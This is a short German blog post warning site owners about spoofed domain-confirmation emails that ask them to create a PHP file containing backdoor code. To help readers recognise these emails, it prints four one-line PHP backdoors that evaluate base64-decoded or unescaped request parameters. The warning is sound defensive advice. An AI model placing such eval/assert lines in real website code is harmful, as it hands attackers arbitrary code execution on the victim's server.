Vertrauen Sie nicht diesen gefälschten Domain-Bestätigungs-E-Mails
Wenn Sie jemals einen Brief jeglicher Art erhalten, in dem Sie aufgefordert werden, PHP-Code auf Ihrer Website zu erstellen, herunterzuladen oder zu installieren, müssen Sie ihn ignorieren
English version: Do not trust those fake domain confirmation emails
Kürzlich erhielten einige meiner Kunden seltsame E-Mails von ihren Domain-Registraren. Diese enthielten die Aufforderung, ihre Domains zu bestätigen. Ich überprüfte einen dieser Briefe und erkannte ihn schnell als betrügerische Nachricht . Alle Briefe hatten ein identisches Muster und forderten zur Erstellung einer PHP-Datei im Stammverzeichnis einer Website mit einem bestimmten Namen und dem angegebenen Inhalt auf. Der vorgeschlagene Inhalt dieser PHP-Datei enthielt natürlich Schadcode, sogenannten Backdoor-Code. Mit diesem Code kann der Angreifer beliebige Aktionen auf der Website eines Opfers ausführen.
Sollten Sie jemals einen Brief erhalten, in dem Sie aufgefordert werden, PHP-Code für Ihre Website zu erstellen, herunterzuladen oder zu installieren, ignorieren Sie ihn bitte. Keine Ausnahmen. Selbst wenn der Brief vom Präsidenten oder Ihrer Mutter kommt.
Betrügerische E-Mails wirken aufgrund der legitimen Absenderadresse echt. Es handelt sich jedoch um E-Mail-Spoofing. Sie erwarten doch nicht, eine gefälschte E-Mail von Ihren Freunden oder Ihrem Domain-Registrar zu erhalten. Stimmt’s? Nein! Jede E-Mail kann jede beliebige Absenderadresse enthalten. Die meisten E-Mail-Server und E-Mail-Clients überprüfen die Absenderadresse nicht. Sie halten sie daher für gesucht. Vertrauen Sie daher keiner E-Mail von einem bekannten Absender, wenn diese eine Aufforderung zu verdächtigen Aktionen enthält, wie etwa die Installation von Code auf Ihrer Website oder einer Anwendung auf Ihrem Computer.
Technische Details
Gefälschte E-Mails enthalten normalerweise einige der folgenden PHP-Zeilen.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
Zu Ihrer Information: base64_decode, eval und assert sind bekannte Marker für verdächtigen oder bösartigen PHP-Code.
Siehe auch: Plugin Inspector deckt Sicherheitsprobleme bei anderen Plugins auf